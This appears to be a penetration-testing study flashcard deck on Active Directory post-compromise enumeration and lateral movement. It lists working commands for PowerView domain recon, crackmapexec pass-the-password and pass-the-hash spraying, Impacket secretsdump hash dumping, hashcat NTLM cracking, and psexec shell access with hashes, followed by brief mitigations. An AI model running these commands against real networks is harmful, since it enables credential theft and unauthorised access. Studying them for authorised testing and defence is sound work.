Post-Compromise Enumeration (Need credentials) Flashcards

1
Q

Powertools/Powerview (github)

A
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

PowerSploit/Recon (github)

A
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Recon with powerview

A

Get-NetDomain
Get-NetDomainController
Get-DomainPolicy
(Get-DomainPolicy).”system access”
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select samaccountname
Get-NetUser | select description (password may be)
Get-UserProperty -Properties pwdlastset
Get-UserProperty -Properties logoncount
Get-UserProperty -Properties badpwdcount

Get-NetComputer
Get-NetComputer -FullData

Get-NetComputer -FullData | selec OperatingSystem

Get-NetGroup
Get-NetGroup -GroupName “Domain Admins”
Get-NetGroup -GroupName “admin”
Get-NetGroupMember -GroupName “Domain Admins”

Invoke-ShareFinder

Get-NetGPO
Get-NetGPO | select displayname, whenchanged

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Pass the password / Pass the Hash (General definition)

A

If we crack a password and /or dump the SAM hashes, we can leverage both for lateral movement in networks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Pass the password

A

crackmapexec smb IP/CIDR -u user -d domain -p pass

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Pass the Hash

A

crackmapexec smb ip/CIDR -u user -H hash –local

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

How dump the NTLM hash of remote windows host with username and passwd ?

A

secretsdump.py marvel/fcastle:Password1@192.168.56.1
(Impacket script)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Crack NTLM / SAM Hash

A

hashcat -m 1000 hash.txt wordlist.txt -O

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

NTML hash VS NTLMv2 hash

A

You can pass NTLM hashs but can’t pass NTLMv2 hashs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Spray the hash via crackmapexec

A

crackmapexec smb 192.168.56.1/24 -u “Frank Castle” -H <hash> --local-auth</hash>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Find writable share via pass the hash via psexec (Quick win to domain admin control; upload shell)

A

psexec.py “franck castle”:@192.168.56.1 -hashes <LMHASH:NTHASH></LMHASH:NTHASH>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Mitigation pass the password / pass the hash

A
  • Limit account re-use
  • Utilize strong passwords
  • Privilege Access Managemement (PAM)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly